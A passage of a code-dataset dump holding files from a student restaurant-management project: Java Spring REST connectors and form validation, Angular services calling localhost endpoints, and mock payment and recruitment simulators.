@Override\r\n public String getRestaurant(String url) {\r\n log.info(\"Sending to {}\", url);\r\n RestTemplate restTemplate = new RestTemplate();\r\n HttpHeaders headers = new HttpHeaders();\r\n headers.setContentType(MediaType.APPLICATION_JSON);\r\n\r\n HttpEntity<String> entity = new HttpEntity<>(headers);\r\n ResponseEntity<String> response = restTemplate.exchange(url, HttpMethod.GET, entity, String.class);\r\n if(response.getStatusCode() == HttpStatus.OK){\r\n return response.getBody();\r\n }else{\r\n return \"Nie udało się!\"; \r\n }\r\n }\r\n\r\n @Override\r\n public String assignManager(String assignManagerForm, String url) {\r\n log.info(\"Sending {} to {}\", assignManagerForm, url);\r\n RestTemplate restTemplate = new RestTemplate();\r\n HttpHeaders headers = new HttpHeaders();\r\n headers.setContentType(MediaType.APPLICATION_JSON);\r\n\r\n HttpEntity<String> entity = new HttpEntity<>(assignManagerForm, headers);\r\n ResponseEntity<String> response = restTemplate.exchange(url, HttpMethod.POST, entity, String.class);\r\n if(response.getStatusCode() == HttpStatus.OK){\r\n return \"Udało się!\";\r\n }else{\r\n return \"Nie udało się!\"; \r\n }\r\n }\r\n\r\n @Override\r\n public String removeRestaurant(String restaurantId, String url) {\r\n String urlWithId = url+\"?id_restauracji=\"+restaurantId;\r\n \r\n log.info(\"Sending to {}\", urlWithId);\r\n RestTemplate restTemplate = new RestTemplate();\r\n HttpHeaders headers = new HttpHeaders();\r\n headers.setContentType(MediaType.APPLICATION_JSON);\r\n\r\n HttpEntity<String> entity = new HttpEntity<>(headers);\r\n ResponseEntity<String> response = restTemplate.exchange(url, HttpMethod.GET, entity, String.class);\r\n if(response.getStatusCode() == HttpStatus.OK){\r\n return \"Udało się!\";\r\n }else{\r\n return \"Nie udało się!\"; \r\n }\r\n }\r\n \r\n}\r\n" }, { "alpha_fraction": 0.49904075264930725, "alphanum_fraction": 0.5067146420478821, "avg_line_length": 27.5744686126709, "blob_id": 
"cd071101aec6d5de9694b3d9f76248a32058d95c", "content_id": "7ccf75ffeea4337bc3f71f7fe5671bf2974819b1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 4170, "license_type": "no_license", "max_line_length": 94, "num_lines": 141, "path": "/zarzadzanie_personelem/zarzadzanie_personelem/src/main/java/zarzadzanie_personelem/Entity/EmployeeForm.java", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": "package zarzadzanie_personelem.Entity;\r\n\r\nimport java.util.function.IntConsumer;\r\nimport org.slf4j.Logger;\r\nimport org.slf4j.LoggerFactory;\r\n\r\npublic class EmployeeForm {\r\n \r\n private static final Logger log = LoggerFactory.getLogger(EmployeeForm.class);\r\n \r\n private boolean valid;\r\n\r\n public boolean isValid() {\r\n return valid;\r\n }\r\n\r\n private String id_restauracji;\r\n private String imie;\r\n private String nazwisko;\r\n private String telefon;\r\n private String stanowisko;\r\n private String id_pracownika;\r\n private String haslo;\r\n\r\n public String getId_restauracji() {\r\n return id_restauracji;\r\n }\r\n\r\n public String getImie() {\r\n return imie;\r\n }\r\n\r\n public String getNazwisko() {\r\n return nazwisko;\r\n }\r\n\r\n public String getTelefon() {\r\n return telefon;\r\n }\r\n\r\n public String getStanowisko() {\r\n return stanowisko;\r\n }\r\n\r\n public String getId_pracownika() {\r\n return id_pracownika;\r\n }\r\n\r\n public String getHaslo() {\r\n return haslo;\r\n }\r\n\r\n public void validate(){\r\n \r\n if(!validateName()){\r\n valid = false;\r\n return;\r\n }\r\n if(!validateLastName()){\r\n valid = false;\r\n return;\r\n }\r\n if(!validateTelephone()){\r\n valid = false;\r\n return;\r\n }\r\n if(!validateId_pracownika()){\r\n valid = false;\r\n return;\r\n }\r\n valid = true;\r\n }\r\n \r\n private boolean validateName(){\r\n if(imie.length() > 20){\r\n log.info(\"String {} has more than 20 signs\", imie);\r\n return false; 
\r\n }\r\n if(!imie.chars().allMatch(Character::isLetter)){\r\n log.info(\"Some signs of {} are not letters\", imie);\r\n return false; \r\n }\r\n if(!Character.isUpperCase(imie.codePointAt(0))){\r\n log.info(\"First letter of {} is not capitalized\", imie);\r\n return false; \r\n }\r\n \r\n if(!imie.substring(1).chars().allMatch(Character::isLowerCase)){\r\n log.info(\"Letters after first one of {} are capitalized\", imie);\r\n return false; \r\n }\r\n return true;\r\n }\r\n \r\n private boolean validateLastName(){\r\n if(nazwisko.length() > 30){\r\n log.info(\"String {} has more than 30 signs\", nazwisko);\r\n return false; \r\n }\r\n if(!nazwisko.chars().allMatch(Character::isLetter)){\r\n log.info(\"Some signs of {} are not letters\", nazwisko);\r\n return false; \r\n }\r\n return true;\r\n }\r\n \r\n private boolean validateTelephone(){\r\n if(!telefon.matches(\"[\\\\d+ ]+\")){\r\n log.info(\"Telephone number {} has illegal signs\", telefon);\r\n return false; \r\n }\r\n String tmpPhone = telefon;\r\n tmpPhone = tmpPhone.replaceAll(\" \", \"\");\r\n if(tmpPhone.codePointAt(0) == '+' && tmpPhone.length() != 12){\r\n log.info(\"Telephone number with plus sign, {}, does not have 9 signs\", telefon);\r\n return false; \r\n }\r\n Integer amountOfNumbers = tmpPhone.replaceAll(\"\\\\D\", \"\").length();\r\n if(amountOfNumbers != 9 && amountOfNumbers != 11 && amountOfNumbers != 13){\r\n log.info(\"Telephone number , {}, has a different size than 9, 11 or 13\", telefon);\r\n return false; \r\n }\r\n return true;\r\n }\r\n \r\n private boolean validateId_pracownika(){\r\n if(id_pracownika.length() > 20){\r\n log.info(\"String {} has more than 20 signs\", id_pracownika);\r\n return false; \r\n }\r\n if(id_pracownika.length() < 5){\r\n log.info(\"String {} has less than 5 signs\", id_pracownika);\r\n return false; \r\n }\r\n if(!id_pracownika.matches(\"[\\\\p{Graph}]+\")){\r\n log.info(\"Some signs of {} are not letters\", id_pracownika);\r\n return false; \r\n }\r\n 
return true;\r\n }\r\n}\r\n" }, { "alpha_fraction": 0.6359060406684875, "alphanum_fraction": 0.649328887462616, "avg_line_length": 30.216217041015625, "blob_id": "2fc0934a04297b3f26541d93a8f1a1342e2b936a", "content_id": "8059c3bd88a082b1075c45e6ce49dc007cd88f73", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 1192, "license_type": "no_license", "max_line_length": 88, "num_lines": 37, "path": "/ui-menadzera-sieci/src/app/services/data.service.ts", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": "import { Injectable } from '@angular/core';\r\nimport { RequestOptions, Response } from '@angular/http';\r\nimport { HttpClient, HttpHeaders } from '@angular/common/http';\r\nimport { Employee } from '../models/Employee';\r\nimport { Restaurant } from '../models/Restaurant';\r\nimport { Recruitment } from '../models/Recruitment';\r\nimport { Observable } from 'rxjs';\r\nimport 'rxjs/Rx';\r\n\r\n@Injectable()\r\nexport class DataService {\r\n\r\n private readonly httpOptions = {\r\n headers: new HttpHeaders({ \"Content-Type\": \"application/json\" })\r\n };\r\n constructor(\r\n public http: HttpClient\r\n ) { }\r\n\r\n addEmployee(employee: Employee) {\r\n return this.http.post('http://localhost:9090/dodaj_pracownika', employee)\r\n }\r\n\r\n addRecruitment(recruitmentNew: Recruitment) {\r\n return this.http.post('http://localhost:9090/dodaj_ogloszenie', recruitmentNew);\r\n }\r\n\r\n getRecruitmentsList() {\r\n return this.http.get('http://localhost:9090/pobierz_ogloszenia')\r\n .map(res => res as Recruitment);\r\n }\r\n\r\n addRestaurant(restaurant: Restaurant) {\r\n return this.http.post('http://localhost:9094/dodaj_restauracje', restaurant);\r\n }\r\n\r\n}\r\n" }, { "alpha_fraction": 0.71875, "alphanum_fraction": 0.71875, "avg_line_length": 30, "blob_id": "82c2494673c9b19f8180aabeeb6209dde63194d4", "content_id": "dddb5d7dda66fdb7d337c2aa839bd0ad5dd21767", "detected_licenses": 
[], "is_generated": false, "is_vendor": false, "language": "Gradle", "length_bytes": 32, "license_type": "no_license", "max_line_length": 30, "num_lines": 1, "path": "/bank_back/settings.gradle", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": "rootProject.name = 'bank_back'\r\n" }, { "alpha_fraction": 0.7222222089767456, "alphanum_fraction": 0.7222222089767456, "avg_line_length": 22.33333396911621, "blob_id": "f7cf11336be04a81be2d585e474f55d969761e81", "content_id": "53997222c4e28cac64a8872c7417f11ff4c547e2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 144, "license_type": "no_license", "max_line_length": 32, "num_lines": 6, "path": "/ui-menadzera-restauracji/src/app/models/Recruitment.ts", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": "export class Recruitment {\r\n public stanowisko: string;\r\n public id_restauracji: number;\r\n public etat: number;\r\n public telefon: number;\r\n}" }, { "alpha_fraction": 0.6218487620353699, "alphanum_fraction": 0.6218487620353699, "avg_line_length": 22.5, "blob_id": "065cfe9ce5646a281ac4fac10f5f4ce44e224679", "content_id": "e95c103e75c00a73fff95f77b43b7043bd046856", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 833, "license_type": "no_license", "max_line_length": 58, "num_lines": 34, "path": "/ui-menadzera-restauracji/src/app/components/add-employee/add-employee.component.ts", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": "import { Component, OnInit } from '@angular/core';\r\nimport { Employee } from '../../models/Employee';\r\nimport { DataService } from '../../services/data.service';\r\n\r\n@Component({\r\n selector: 'app-add-employee',\r\n templateUrl: './add-employee.component.html',\r\n styleUrls: ['./add-employee.component.css']\r\n})\r\nexport class AddEmployeeComponent implements 
OnInit {\r\n\r\n employee: Employee = new Employee();\r\n alertString: string = \"\";\r\n\r\n constructor(\r\n public dataService: DataService\r\n ) { }\r\n\r\n ngOnInit() {\r\n\r\n }\r\n\r\n onSubmit() {\r\n this.dataService.addEmployee(this.employee)\r\n .subscribe(res => {\r\n console.log(res);\r\n var getValueArray = Object.values(res)\r\n this.alertString += getValueArray;\r\n alert(this.alertString.split(',').join(\"\"));\r\n this.alertString = \"\";\r\n });\r\n }\r\n\r\n}\r\n" }, { "alpha_fraction": 0.796407163143158, "alphanum_fraction": 0.8682634830474854, "avg_line_length": 46, "blob_id": "de97369f7abe0602c63c39f9ce18dc4ad8feff46", "content_id": "4cdba58eb9c02dd740082c418f0ab2337b71b2c7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 334, "license_type": "no_license", "max_line_length": 64, "num_lines": 7, "path": "/zarzadzanie_personelem/zarzadzanie_personelem/src/main/resources/application.properties", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": "server.port=9090\r\n\r\ncreateEmployeeAddress=http://localhost:9091/dodajPracownika\r\ngetEmployeesAddress=http://localhost:9091/pobierzPracownikow\r\nremoveEmployeesAddress=http://localhost:9091/usunPracownika\r\ncreateEmployeeOfferAddress=http://localhost:9091/dodajOgloszenie\r\ngetEmployeeOffersAddress=http://localhost:9091/pobierzOgloszenia" }, { "alpha_fraction": 0.733668327331543, "alphanum_fraction": 0.8140703439712524, "avg_line_length": 37.79999923706055, "blob_id": "b76eedf19a72efd76412126d563989df9cdfec92", "content_id": "9bd87ec68136b677d4254809c1f421eb58ea0fe4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 199, "license_type": "no_license", "max_line_length": 67, "num_lines": 5, "path": "/bank_back/src/main/resources/application.properties", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": 
"server.port=9093\r\n\r\nmockPaymentAddressSuccess = http://localhost:9092/potwierdz_zaplate\r\nmockPaymentAddressFailure = http://localhost:9092/anuluj_zaplate\r\nmockPaymentAddress = http://localhost:4042\r\n" }, { "alpha_fraction": 0.6649305820465088, "alphanum_fraction": 0.6649305820465088, "avg_line_length": 25.5238094329834, "blob_id": "22bc04a6455a0fbd3942cc6f3e1c61bc160f45a8", "content_id": "1f0c80f0c5dd6f3c03af9fde46fa62a526812d6d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 576, "license_type": "no_license", "max_line_length": 69, "num_lines": 21, "path": "/recruitment-simulation/src/app/app.component.ts", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": "import { Component } from '@angular/core';\r\nimport { DataService } from './services/data.service';\r\nimport { Recruitment } from './models/Recruitment';\r\n\r\n@Component({\r\n selector: 'app-root',\r\n templateUrl: './app.component.html',\r\n styleUrls: ['./app.component.css']\r\n})\r\nexport class AppComponent {\r\n title = 'payment-simulation';\r\n recruitment: any = new Recruitment();\r\n\r\n constructor(public dataService: DataService) { }\r\n ngOnInit() {\r\n this.dataService.getRecruitmentsList().subscribe(recruitment => {\r\n this.recruitment = recruitment;\r\n });\r\n }\r\n\r\n}" }, { "alpha_fraction": 0.6554809808731079, "alphanum_fraction": 0.6644295454025269, "avg_line_length": 25.9375, "blob_id": "76e7ed4a95622b90d143d558e713c9d2d4c94899", "content_id": "d7bb97a7685008d15340f9eb80e184f3301f7311", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 447, "license_type": "no_license", "max_line_length": 73, "num_lines": 16, "path": "/recruitment-simulation/src/app/services/data.service.ts", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": "import { Injectable } from '@angular/core';\r\nimport { 
Headers, RequestOptions, Response } from '@angular/http';\r\nimport { HttpClient } from '@angular/common/http';\r\nimport { Recruitment } from '../models/Recruitment';\r\n\r\n@Injectable()\r\nexport class DataService {\r\n\r\n constructor(public http: HttpClient) { }\r\n\r\n id:string; \r\n\r\n getRecruitmentsList() {\r\n return this.http.get('http://localhost:9090/pobierz_ogloszenia');\r\n }\r\n}\r\n" }, { "alpha_fraction": 0.6438791751861572, "alphanum_fraction": 0.6470588445663452, "avg_line_length": 21.370370864868164, "blob_id": "02e1867f6dd5e6fb72daa72e2c44868521727291", "content_id": "8b8bfd73c2feddbf1a5eca68536a792c9a824a6c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 630, "license_type": "no_license", "max_line_length": 54, "num_lines": 27, "path": "/payment-simulation/src/app/app.component.ts", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": "import { Component } from '@angular/core';\r\nimport { DataService } from './services/data.service';\r\n\r\n@Component({\r\n selector: 'app-root',\r\n templateUrl: './app.component.html',\r\n styleUrls: ['./app.component.css']\r\n})\r\nexport class AppComponent {\r\n title = 'payment-simulation';\r\n status1: string = \"Porażka\";\r\n status2: string = \"Sukcess\";\r\n\r\n constructor(public dataService: DataService) { }\r\n ngOnInit() { }\r\n\r\n onSubmit() {\r\n this.radioChangeHandler(event);\r\n console.log(status);\r\n this.dataService.sendStatus(status);\r\n }\r\n\r\n radioChangeHandler(event: any) {\r\n status = event.target.value;\r\n }\r\n\r\n}" }, { "alpha_fraction": 0.7076336145401001, "alphanum_fraction": 0.709160327911377, "avg_line_length": 32.47368240356445, "blob_id": "3f5f14aa31d319c51b646a9b4e9430cdd33f58ce", "content_id": "65fb8b6e3e6f9833c213b2428e9020be2856bbb2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1310, "license_type": 
"no_license", "max_line_length": 135, "num_lines": 38, "path": "/baza_zarzadzanie_siecia/src/main/java/baza_zarzadzanie_siecia/Entity/MockConnector.java", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": "/*\r\n * To change this license header, choose License Headers in Project Properties.\r\n * To change this template file, choose Tools | Templates\r\n * and open the template in the editor.\r\n */\r\npackage baza_zarzadzanie_siecia.Entity;\r\n\r\nimport org.slf4j.Logger;\r\nimport org.slf4j.LoggerFactory;\r\n\r\n/**\r\n *\r\n * @author adas\r\n */\r\npublic class MockConnector implements Connector{\r\n \r\n private static final Logger log = LoggerFactory.getLogger(MockConnector.class);\r\n\r\n @Override\r\n public String createRestaurant(final String employeeFormJson, final String url) {\r\n return \"You are perfect!\"; \r\n }\r\n\r\n @Override\r\n public String getRestaurant(String property) {\r\n throw new UnsupportedOperationException(\"Not supported yet.\"); //To change body of generated methods, choose Tools | Templates.\r\n }\r\n\r\n @Override\r\n public String assignManager(String assignManagerForm, String property) {\r\n throw new UnsupportedOperationException(\"Not supported yet.\"); //To change body of generated methods, choose Tools | Templates.\r\n }\r\n\r\n @Override\r\n public String removeRestaurant(String restaurantIdForm, String property) {\r\n throw new UnsupportedOperationException(\"Not supported yet.\"); //To change body of generated methods, choose Tools | Templates.\r\n }\r\n}\r\n" }, { "alpha_fraction": 0.5797101259231567, "alphanum_fraction": 0.591567873954773, "avg_line_length": 32.5, "blob_id": "1be9c81ab66bd6f896c93a130f9cca01e64c2dfd", "content_id": "7df39413c2eef0e671ac18795c13fd3b0df85c23", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 763, "license_type": "no_license", "max_line_length": 115, "num_lines": 22, "path": 
"/payment-simulation/src/app/services/data.service.ts", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": "import { Injectable } from '@angular/core';\r\nimport { Headers, RequestOptions, Response } from '@angular/http';\r\nimport { HttpClient } from '@angular/common/http';\r\n\r\n@Injectable()\r\nexport class DataService {\r\n\r\n constructor(public http: HttpClient) { }\r\n\r\n id:string; \r\n\r\n sendStatus(status) {\r\n this.id = window.location.href.split(\"/\")[3];\r\n if (status === \"Porażka\") {\r\n console.log('wysłana Porażka');\r\n return this.http.get(`http://localhost:9093/failure?id=${this.id}`).subscribe(res => console.log(res));\r\n } else {\r\n console.log('wysłany Sukces');\r\n return this.http.get(`http://localhost:9093/success?id=${this.id}`).subscribe(res => console.log(res));\r\n }\r\n }\r\n}\r\n" }, { "alpha_fraction": 0.6348484754562378, "alphanum_fraction": 0.6378787755966187, "avg_line_length": 23.384614944458008, "blob_id": "09673cc6294a86b36af6e8e12402b082d3da77f4", "content_id": "e422a4f984aaa5c8ff1fe47e93bd78820dfbc245", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 660, "license_type": "no_license", "max_line_length": 84, "num_lines": 26, "path": "/platnosci/platnosci/src/main/java/platnosci/Entity/PrzelewPayment.java", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": "package platnosci.Entity;\r\n\r\nimport org.slf4j.Logger;\r\nimport org.slf4j.LoggerFactory;\r\n\r\npublic class PrzelewPayment extends PaymentAbstract{\r\n \r\n private static final Logger log = LoggerFactory.getLogger(PrzelewPayment.class);\r\n \r\n public PrzelewPayment(final String url){\r\n super(url);\r\n }\r\n\r\n @Override\r\n public String pay(PaymentForm paymentForm) {\r\n if(paymentForm.isValid()){\r\n return getPaymentRedirect(paymentForm);\r\n }else{\r\n return \"Invalid input\";\r\n }\r\n } \r\n \r\n private String 
getPaymentRedirect(PaymentForm paymentForm){\r\n return \"Not implemented\";\r\n }\r\n}\r\n" } ]
46
ysywh/match
https://github.com/ysywh/match
c421be8cba4e03bd20d6a5d5711164a76148db5a
33f53faf56f546fdc00c10eee25e3af33cbf62f7
fcbe6ebdd618337ba0a6616c83b4b1ca488f9af4
refs/heads/master
2021-01-10T01:09:14.508254
2015-06-01T04:09:45
2015-06-01T04:09:45
36,636,920
5
3
null
null
null
null
null
[ { "alpha_fraction": 0.699999988079071, "alphanum_fraction": 0.699999988079071, "avg_line_length": 9, "blob_id": "136c6d9a3b8c913ac1643d8abd061952fed7c88a", "content_id": "f797aed7cbda5a3327ac8eda10a0c8a0e615b207", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 20, "license_type": "no_license", "max_line_length": 11, "num_lines": 2, "path": "/README.md", "repo_name": "ysywh/match", "src_encoding": "UTF-8", "text": "# match\nmatch code.\n" }, { "alpha_fraction": 0.4669073522090912, "alphanum_fraction": 0.5728038549423218, "avg_line_length": 29.77777862548828, "blob_id": "22ec7a092fd4a470d04eeaefcb10b2dad209535a", "content_id": "f1b927b19ed0aad72220de53f9173016a489d4b2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 831, "license_type": "no_license", "max_line_length": 114, "num_lines": 27, "path": "/访问限制/topo3.py", "repo_name": "ysywh/match", "src_encoding": "UTF-8", "text": "from mininet.topo import Topo\nclass MyTopo(Topo):\n\tdef __init__(self):\n\t Topo.__init__(self)\n\t c=[]\n\t a=[]\n\t s=[]\n\t \n\t s.append(self.addSwitch('s1'))\n\t s.append(self.addSwitch('s2'))\n\t s.append(self.addSwitch('s3'))\n\t \n\t self.addLink(s[0],s[1],3,1)\n\t self.addLink(s[1],s[2],3,1)\n\t h1=self.addHost('h1',mac='00:00:00:00:00:01')\n\t h2=self.addHost('h2',mac='00:00:00:00:00:02')\n\t h3=self.addHost('h3',mac='00:00:00:00:00:03')\n\t h4=self.addHost('h4',mac='00:00:00:00:00:04')\n\t \n self.addLink(s[0],h1,1,1)\n\t self.addLink(s[0],h2,2,1)\n\t self.addLink(s[1],h3,2,1)\n\t self.addLink(s[2],h4,2,1)\n\t #self.addLink(e[1],h3)\ntopos={'mytopo':(lambda:MyTopo())}\n\n# mn --mac --custom /home/hl/text/topo3.py --topo mytopo --switch ovsk,protocols=OpenFlow13 --controller remote -x\n" }, { "alpha_fraction": 0.5805884003639221, "alphanum_fraction": 0.5892632603645325, "avg_line_length": 39.581634521484375, "blob_id": "1f79574ce99c944f020d606c2ef51530974b9a63", 
"content_id": "1cd83caeb2081ba4385d4c74f4861dcf8f5ad542", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7954, "license_type": "no_license", "max_line_length": 127, "num_lines": 196, "path": "/设计题/badWeb_Protection.py", "repo_name": "ysywh/match", "src_encoding": "UTF-8", "text": "# Copyright (C) 2011 Nippon Telegraph and Telephone Corporation.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or\n# implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom ryu.base import app_manager\nfrom ryu.controller import ofp_event\nfrom ryu.controller.handler import CONFIG_DISPATCHER, MAIN_DISPATCHER\nfrom ryu.controller.handler import set_ev_cls\nfrom ryu.ofproto import ofproto_v1_3\nfrom ryu.lib.packet import packet\nfrom ryu.lib.packet import ethernet\nfrom ryu.lib.packet import ipv4\nfrom ryu.lib.packet import tcp\nfrom ryu.lib.packet import udp\nfrom ryu.ofproto import inet\nfrom ryu.ofproto import ether\n\nfrom ryu import utils\nimport binascii\nfrom dnslib.dns import DNSRecord\nimport MySQLdb\n\n#WEB_lacklist = [\"www.taobao.com\", \"www.icbc.com.cn\"]\n\n\nclass SimpleSwitch13(app_manager.RyuApp):\n OFP_VERSIONS = [ofproto_v1_3.OFP_VERSION]\n\n def __init__(self, *args, **kwargs):\n super(SimpleSwitch13, self).__init__(*args, **kwargs)\n self.mac_to_port = {}\n\n @set_ev_cls(ofp_event.EventOFPSwitchFeatures, CONFIG_DISPATCHER)\n def switch_features_handler(self, ev):\n datapath = ev.msg.datapath\n ofproto = datapath.ofproto\n parser = datapath.ofproto_parser\n\n 
# add goto table 1 flow entry on table 0\n match = parser.OFPMatch()\n inst = [parser.OFPInstructionGotoTable(table_id=1)]\n self.add_flow(datapath, 0, match, table_id=0, inst=inst)\n # install table-miss flow entry on table 1\n actions = [parser.OFPActionOutput(ofproto.OFPP_CONTROLLER,\n ofproto.OFPCML_NO_BUFFER)]\n self.add_flow(datapath, 0, match, actions, table_id=1)\n # install udp_dst_port 50 flow entry on table 0 to match DNS request\n # packet.\n match = parser.OFPMatch(\n eth_type=ether.ETH_TYPE_IP, ip_proto=inet.IPPROTO_UDP, udp_dst=53)\n self.add_flow(datapath, 10, match, actions, table_id=0)\n\n def add_flow(self, datapath, priority, match, actions=[], table_id=0,\n idle_timeout=0, hard_timeout=0, buffer_id=None, inst=None):\n ofproto = datapath.ofproto\n parser = datapath.ofproto_parser\n if not inst:\n inst = [parser.OFPInstructionActions(ofproto.OFPIT_APPLY_ACTIONS,\n actions)]\n if buffer_id:\n mod = parser.OFPFlowMod(datapath=datapath, table_id=table_id, idle_timeout=idle_timeout, hard_timeout=hard_timeout,\n buffer_id=buffer_id, priority=priority, match=match, instructions=inst)\n else:\n mod = parser.OFPFlowMod(datapath=datapath, priority=priority, table_id=table_id, idle_timeout=idle_timeout,\n hard_timeout=hard_timeout, match=match, instructions=inst)\n datapath.send_msg(mod)\n\n @set_ev_cls(ofp_event.EventOFPPacketIn, MAIN_DISPATCHER)\n def _packet_in_handler(self, ev):\n # If you hit this you might want to increase\n # the \"miss_send_length\" of your switch\n if ev.msg.msg_len < ev.msg.total_len:\n self.logger.debug(\"packet truncated: only %s of %s bytes\",\n ev.msg.msg_len, ev.msg.total_len)\n msg = ev.msg\n datapath = msg.datapath\n ofproto = datapath.ofproto\n parser = datapath.ofproto_parser\n\n pkt = packet.Packet(msg.data)\n eth = pkt.get_protocols(ethernet.ethernet)[0]\n\n # judge \"DNS packet\"\n pkt_ipv4 = pkt.get_protocol(ipv4.ipv4)\n if pkt_ipv4:\n if(pkt_ipv4.proto == inet.IPPROTO_UDP):\n pkt_udp = pkt.get_protocol(udp.udp)\n if 
53 == pkt_udp.dst_port:\n print \" DNS request:dst_prot\", pkt_udp.dst_port\n self._badWeb_Potect(datapath, msg)\n else:\n self._forwarding(datapath, msg)\n\n # bad web judge and protection\n def _badWeb_Potect(self, datapath, msg):\n print \"in _badWeb_Potect\"\n ofproto = datapath.ofproto\n parser = datapath.ofproto_parser\n pkt = packet.Packet(msg.data)\n hdata = utils.hex_array(msg.data)\n hdata = hdata.split(' ')\n hex_data = ''\n for hexdata in hdata:\n cc = hexdata.replace('0x', '')\n if len(cc) == 1:\n cc = '0%s' % cc\n hex_data = hex_data + cc\n # print \"hex_data\", hex_data\n # print 'pkt:', pkt\n\n hex_dnsdata = hex_data[84:]\n # print \"dns hex data\", hex_dnsdata\n dns_binary = binascii.unhexlify(hex_dnsdata)\n dns = DNSRecord.parse(dns_binary)\n # print 'dns:', dns\n dns\n web_name = dns.questions[0].get_qname().label\n web_name = \".\".join(list(web_name))\n # print web_name\n\n try:\n conn = MySQLdb.connect(\n host='localhost', user='root', passwd='123456', db='web', port=3306)\n cur = conn.cursor()\n select = 'select * from WEB_lacklist where name=\"%s\"' % web_name\n if(cur.execute(select)):\n print ' ilegal web \"%s\", it`s dangerous! you can`t to access it.' % web_name\n cur.close()\n conn.close()\n return\n else:\n print 'legal web \"%s\",you can access it.' 
% web_name\n cur.close()\n conn.close()\n self._forwarding(datapath, msg)\n except MySQLdb.Error, e:\n print \"Mysql Error %d: %s\" % (e.args[0], e.args[1])\n\n # for web in WEB_lacklist:\n # if web_name == web:\n # print \"ilegal web, you can`t to access.\"\n # return\n # else:\n # self._forwarding(datapath, msg)\n\n def _forwarding(self, datapath, msg):\n print \"in _forwarding...\"\n datapath = msg.datapath\n ofproto = datapath.ofproto\n parser = datapath.ofproto_parser\n in_port = msg.match['in_port']\n\n pkt = packet.Packet(msg.data)\n eth = pkt.get_protocols(ethernet.ethernet)[0]\n dst = eth.dst\n src = eth.src\n dpid = datapath.id\n self.mac_to_port.setdefault(dpid, {})\n # learn a mac address to avoid FLOOD next time.\n self.mac_to_port[dpid][src] = in_port\n\n if dst in self.mac_to_port[dpid]:\n out_port = self.mac_to_port[dpid][dst]\n else:\n out_port = ofproto.OFPP_FLOOD\n\n actions = [parser.OFPActionOutput(out_port)]\n # install a flow to avoid packet_in next time\n if out_port != ofproto.OFPP_FLOOD:\n match = parser.OFPMatch(in_port=in_port, eth_dst=dst)\n # verify if we have a valid buffer_id, if yes avoid to send both\n # flow_mod & packet_out\n if msg.buffer_id != ofproto.OFP_NO_BUFFER:\n self.add_flow(datapath, 1, match, actions,\n idle_timeout=10, hard_timeout=10, table_id=1, buffer_id=msg.buffer_id)\n else:\n self.add_flow(datapath, 1, match, actions, idle_timeout=10, table_id=1,\n hard_timeout=10)\n data = None\n if msg.buffer_id == ofproto.OFP_NO_BUFFER:\n data = msg.data\n if (out_port == ofproto.OFPP_FLOOD) or (msg.buffer_id == ofproto.OFP_NO_BUFFER):\n out = parser.OFPPacketOut(datapath=datapath, buffer_id=msg.buffer_id,\n in_port=in_port, actions=actions, data=data)\n datapath.send_msg(out)\n" }, { "alpha_fraction": 0.5753828883171082, "alphanum_fraction": 0.5865119099617004, "avg_line_length": 44.12017059326172, "blob_id": "20bc2d224f4d89f6196a1cf69c6573d5a1b18d94", "content_id": "2706e93bd52550678eb238373539f588c61f16c4", 
